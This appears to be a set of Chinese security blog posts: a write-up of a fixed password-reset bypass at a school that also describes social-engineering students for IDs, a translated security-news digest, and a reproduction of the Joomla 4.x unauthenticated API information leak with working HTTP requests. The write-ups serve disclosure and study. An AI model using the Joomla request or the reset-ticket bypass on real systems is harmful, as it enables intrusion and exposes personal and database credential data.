漏洞已修复，感谢某大佬的知识分享。 任意用户密码重置->可获取全校师生个人mingan信息 开局就是信息收集。 对于挖掘edu的信息收集 1.可尝试谷歌搜索语法，获取学号信息 2. 旁站的渗透获取 3. 学校的贴吧获取(大部分都是本校学生) 当然我就是闲，进了目标学校的贴吧，跟他们聊天，然后你懂的（不推荐这样去做） 类似于钓鱼吧 再获取到学号的信息，自然就是水到渠成。 由于权限太小，功能点太少，fuzz不到接口，j也没有mingan接口，越权就更不存在了。 放弃了，去看看找回密码吧。 先爆破一波账号是否存在(能不用别人账号就不用) 123456账号存在 找回密码这里随便输入3个必选项，然后提交。 尝试更改返回包，看看是不是只有前端校验。 果然跟我想的一样，回到输入账号处了。 那没办法了，咱还是得用关系，用好大哥的账号，然后再从他个人信息里面掏点东西过验证。 重置成功了，但发现一个不对劲的地方，仔细想想发现有机会可以绕过。 首先，Newpass参数是加密的重置密码，也就是123456。 Post发包就一个参数，还是密码。 通过排除法能判定 Access-Reset-Ticket是校验用户 一开始我是不信的，CAS校验应该是这样的 本来TGT是CAS为用户签发的登录票据，拥有了TGT，用户就可以证明自己在CAS成功登录过。 这些直接大缩水呢。 但又没登录 怎么获取的当前用户的Access-Reset-Ticket？ 真相只有一个，看看接口哪里获取到的 原来是在输入要找回的用户，就会获取当前用户的Access-Reset-Ticket 6到了，开发是我大哥！ 尝试修改 可行，修改管理员账号，然后起飞。 下机。 漏洞是已修复，厂商也修复了漏洞更新到了最新版本。

1、黑客利用虚假ChatGPT应用程序来分发恶意软件 https://www.bleepingcomputer.com/news/security/hackers-use-fake-chatgpt-apps-to-push-windows-android-malware/ 安全研究员Dominic Alvieri发现，威胁行为者正在利用OpenAI的ChatGPT聊天机器人的热度来分发适用于Windows和Android的恶意软件，或将毫无戒心的受害者引导至网络钓鱼页面。钓鱼网站由Facebook页面推广，该页面使用官方ChatGPT徽标来诱骗用户重定向到恶意站点，用Redline信息窃取恶意软件感染访问者。研究人员还发现了在谷歌Play和第三 2、水果巨头都乐食品公司遭到勒索软件攻击影响运营 https://www.bleepingcomputer.com/news/security/fruit-giant-dole-suffers-ransomware-attack-impacting-operations/ 新鲜水果蔬菜生产商和分销商都乐食品公司（Dole Food Company）宣布，该公司正在应对影响其运营的勒索软件攻击。目前还没有多少细节，该公司目前正在调查“事件的范围”，并指出影响有限。尽管都乐将影响描述为“有限”，但德克萨斯州一家杂货店在Facebook上泄露的一份便笺显示，这家食品巨头被迫关闭了其在北美的生产工厂。都乐似乎也停止了向杂货店发货。该便笺还提到，都乐 3、谷歌发布更新修复了Chrome浏览器中的RCE漏洞 https://www.scmagazine.com/news/vulnerability-management/google-critical-rce-bug-chrome-browser 谷歌修补了其Chrome网络浏览器中一个严重的远程代码执行漏洞，该漏洞允许攻击者通过欺骗受害者访问恶意网站，就能在受害者的系统上安装恶意软件。作为其Chrome浏览器2月份安全更新的一部分，谷歌还修补了6个高严重性漏洞，其中一个已存在将近一年。 4、攻击者通过Discord分发恶意软件针对政府实体 https://www.menlosecurity.com/blog/purecrypter-targets-government-entities-through-discord/ Menlo Labs发现了一个未知的威胁行为者，该行为者利用通过Discord分发的规避威胁活动，该活动以PureCrypter下载器为特征，并以政府实体为目标。PureCrypter活动使用一个受感染的非营利组织的域作为命令和控制（C2）来提供第二个有效载荷。研究人员调查发现，该活动传播了多种类型的恶意软件，包括Redline Stealer、AgentTesla、Eternity、Blackmoon和Phi 5、11个国家参加了西欧最大军事网络演习DCM2 https://www.securityweek.com/11-countries-take-part-in-military-cyberwarfare-exercise/ 西欧最大的军事网络演习Defense Cyber Marvel 2（DCM2）最近在爱沙尼亚举行，共有来自11个国家的34支队伍参加了这场网络演习。美国、英国、日本、印度、意大利、爱沙尼亚、乌克兰、加纳、肯尼亚和阿曼等国家派出750名专家参加。这场为期七天的活动由英国陆军领头，测试了参与者对常见和复杂网络场景的反应，包括对网络和工业控制系统（ICS）的攻击。参赛队伍相互竞争，并根据他们识别和应对网络威胁的速度进行评判。来 6、Android应用程序数据安全标签存在漏洞 https://thehackernews.com/2023/02/majority-of-android-apps-on-google-play.html Mozilla基金会调查发现，谷歌Play商店中可用的Android应用程序的数据安全标签存在“严重漏洞”，这些漏洞允许应用程序提供误导性或完全虚假的信息。该项调查比较了应用市场上20个最受欢迎的付费应用和20个最受欢迎的免费应用的隐私政策和标签，大约80%的被审查应用程序中，“由于应用程序的隐私政策与应用程序在谷歌数据安全表格上自我报告的信息之间的差异，这些标签是虚假的或具有误导性的。”Mozilla表示，消费者正在被引导“相信这些应 7、洛杉矶联合学区遭到黑客攻击暴露学生记录 https://www.govtech.com/security/l-a-unified-hack-exposed-2k-student-records-officials-say 洛杉矶联合学区上周三透露，由于最近的一次网络攻击，“大约2000名学生的评估记录”被发布在暗网上，其中包括目前在读的60名学生的评估记录。泄露的记录还包括数量不详的驾照号码和社会安全号码。学区声明说：“我们已经通知了一些受到这次攻击影响的个人和供应商，并将在确定后继续通知个人。”并补充道：“其中一些记录可以追溯到近30年前，这造成了进一步耗时的分析。我们的审查还显示，COVID-19阳性检测结果也是违规行为的一部 8、新的“Clasiopa”威胁组织以材料研究组织为目标 https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research 观察到一个迄今未知的攻击组织以亚洲的一家材料研究组织为目标。该组织被赛门铁克称为 Clasiopa，其特点是具有独特的工具集，其中包括一个自定义恶意软件 (Backdoor.Atharvan)。目前，没有确凿的证据表明 Clasiopa 位于何处或代表谁行事。 9、俄罗斯广播电台遭匿名者组织入侵播放虚假警告 https://www.hackread.com/russia-hacked-radio-station-missile-alerts/ 本周三上午，俄罗斯十几个城市的数百万公民听到了不寻常的无线电警报、警报器声还收到警告短信。这些警告是关于对俄罗斯的导弹袭击和空袭。然而，俄罗斯政府紧急情况部后来宣布这些是虚假警告，并指责黑客在商业广播电台播放虚假警报。据当地媒体报道，一个女声从几家电台发出了虚假警报，包括Yumor FM、Relax FM、Comedy Radio、Humor FM和Avatoradio。虚假警告宣布空袭，并要求听众迅速寻求庇护。匿名者黑客组织发布的一条推文称，他们扰乱了俄 10、加拿大第二大电信公司TELUS遭数据泄露 https://www.bleepingcomputer.com/news/security/telus-investigating-leak-of-stolen-source-code-employee-data/ 加拿大第二大电信公司TELUS正在调查一起潜在的数据泄露事件。2月17日，一名威胁行为者在数据泄露论坛上发布了他们声称的TELUS员工名单（包括姓名和电子邮件地址）以供出售。该帖子称“TELUS的员工信息最近被泄露。我们有超过7600封唯一的电子邮件，除此之外，我们还有从TELUS的API中获取的与每位员工相关的内部信息。”截至2月21日，同一个威胁行为者创建了另一个论坛帖子， 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

漏洞简介 　　 　　在 Joomla! 版本为4.0.0 到 4.2.7中发现了一个漏洞，在Joomla受影响的版本中由于对Web服务端点的访问限制不当，远程攻击者可以绕过安全限制获得Web应用程序敏感信息。 影响版本 　　4.0.0 <= Joomla <= 4.2.7 环境搭建 　　文件下载地址 https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.zip?format=zip 　　利用 phpstudy 搭建漏洞环境 　　我们利用 phpstudy 来搭建环境，选择 Apache2.4.39 + MySQL5.7.26+ php7.4.3 ，同时利用 PhpStorm 来实现对项目的调试 　　 　　安装完成后 　　前台 　　 　　后台 　　 漏洞复现 　　构造路由 /api/index.php/v1/config/application?public=true 　　返回了数据库的相关信息 　　 　　 漏洞分析 　　经过调试分析发现是对 api 路径下的身份校验进行了绕过，默认在未登录的情况下访问 返回 {"errors":[{"title":"Forbidden"}]} 　　所以就针对于 api 路径下的身份校验进行具体分析 　　 api/index.php 　　 　　 api/includes/app.php 　　 　　 \Joomla\CMS\Application\CMSApplication::execute 　　 　　 \Joomla\CMS\Application\ApiApplication::doExecute 　　 　　其中的 $this->route(); 对应了路由应用程序 　　 \Joomla\CMS\Application\ApiApplication::route 　　 　　 　　 $router 对应了 api 下所有的路由信息，之后调用 parseApiRoute 对路由进行处理 　　 \Joomla\CMS\Router\ApiRouter::parseApiRoute 　　 　　 　　当 public 为false 时，是禁止外部访问的 GET /api/index.php/v1/config/application HTTP/1.1 Host: joomla.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie:XDEBUG_SESSION=PHPSTORM Connection: close 　　 　　‍ 　　但是通过路径传入的值在之后可以覆盖替换原本的值 　　 GET /api/index.php/v1/config/application?public=true HTTP/1.1 Host: joomla.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie:XDEBUG_SESSION=PHPSTORM Connection: close 　　‍ 　　 　　‍